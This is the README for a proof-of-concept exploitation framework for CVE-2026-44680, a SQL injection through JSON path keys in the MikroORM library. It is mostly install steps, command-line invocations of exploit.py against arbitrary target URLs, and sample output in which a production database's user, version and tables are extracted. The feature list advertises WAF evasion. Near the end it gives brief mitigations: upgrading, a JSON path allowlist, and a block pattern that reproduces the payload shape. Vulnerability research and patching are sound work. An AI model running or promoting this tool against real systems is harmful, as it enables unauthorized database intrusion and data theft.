
PoC tool for CVE-2026-44680 affecting MikroORM ≤7.0.13. Exploits JSON path injection to extract database contents via UNION-based attacks. Features vulnerability detection, automated data extraction, table enumeration, and blind injection support. Includes proxy integration for Burp Suite and WAF evasion techniques.
Professional Proof-of-Concept Tool for Security Researchers
CVE-2026-44680 is a critical SQL injection vulnerability affecting MikroORM, a popular TypeScript ORM for Node.js. This exploit framework provides security researchers and penetration testers with a professional tool to detect and exploit the vulnerability.
Author: Sudeepa Wanigarathna
Version: 1.0.0
Classification: Professional Security Research Tool
| Attribute | Value |
|---|
| CVE ID | CVE-2026-44680 |
| CVSS Score | 7.6 (High) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | Low |
@mikro-orm/knex <= 6.6.13@mikro-orm/sql <= 7.0.13MikroORM fails to properly escape runtime-controlled JSON path keys when building JSON_EXTRACT queries. Attackers can break out of the JSON path context and inject arbitrary SQL code.
| Feature | Description | Status |
|---|---|---|
| Vulnerability Detection | Time-based & error-based detection | ✅ |
| Database Extraction | Version, database, user, hostname | ✅ |
| Table Enumeration | Auto-discovery of all tables | ✅ |
| UNION-Based Injection | Extract data via UNION SELECT | ✅ |
| Blind Injection | Boolean-based character extraction | ✅ |
| Proxy Support | Burp Suite / intercepting proxy | ✅ |
| Report Generation | Professional TXT reports | ✅ |
| WAF Evasion | Advanced obfuscation techniques | ✅ |
# Python 3.8 or higher
python3 --version
# pip package manager
pip --version
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit
# Using requirements.txt
pip install -r requirements.txt
# Or install manually
pip install requests colorama tqdm urllib3 simplejson
python exploit.py --help
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0
# Full exploitation
python exploit.py -u http://localhost:3000
# Vulnerability detection only
python exploit.py -u http://target.com --detect
# Extract database information
python exploit.py -u http://target.com --extract
# Enumerate tables
python exploit.py -u http://target.com --enumerate
| Flag | Description | Default |
|---|---|---|
-u, --url | Target URL (required) | - |
-e, --endpoint | API endpoint | /api/users/search |
-p, --proxy | HTTP proxy | None |
-v, --verbose | Verbose output | False |
--detect | Detect vulnerability only | False |
--extract | Extract database info | False |
--enumerate | Enumerate tables | False |
--blind | Blind injection mode | False |
python exploit.py -u http://192.168.1.100:3000
python exploit.py -u http://target.com -e /api/v2/users/query
python exploit.py -u http://target.com -p http://127.0.0.1:8080
python exploit.py -u http://target.com -v --extract
python exploit.py -u http://target.com --blind
python exploit.py -u http://target.com --detect
python exploit.py -u http://target.com --extract
python exploit.py -u http://target.com --enumerate
============================================================
MikroORM CVE-2026-44680 Exploitation Framework
Author: Sudeepa Wanigarathna
============================================================
[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection
[+] Vulnerability confirmed!
[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin
===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000
[*] VULNERABILITY DETAILS
- CVE: CVE-2026-44680
- CVSS Score: 7.6 (High)
- Affected Components: @mikro-orm/knex <= 6.6.13
[*] DATABASE INFORMATION
- Version: 10.11.6-MariaDB
- Database: production_db
- User: root@localhost
- Hostname: localhost
[*] ENUMERATED TABLES (5 found)
1. users
2. products
3. orders
4. payments
5. admin
[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt
exploit_report_1742493645.txt # Complete exploitation report
tables_1742493645.txt # List of discovered tables
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];
function validateJsonPath(key) {
if (!ALLOWED_JSON_PATHS.includes(key)) {
throw new Error('Invalid JSON path');
}
return key;
}
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "
IMPORTANT: This tool is for authorized security testing and educational purposes only.
This project is licensed under the MIT License.
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...
Made with ❤️ for the Security Research Community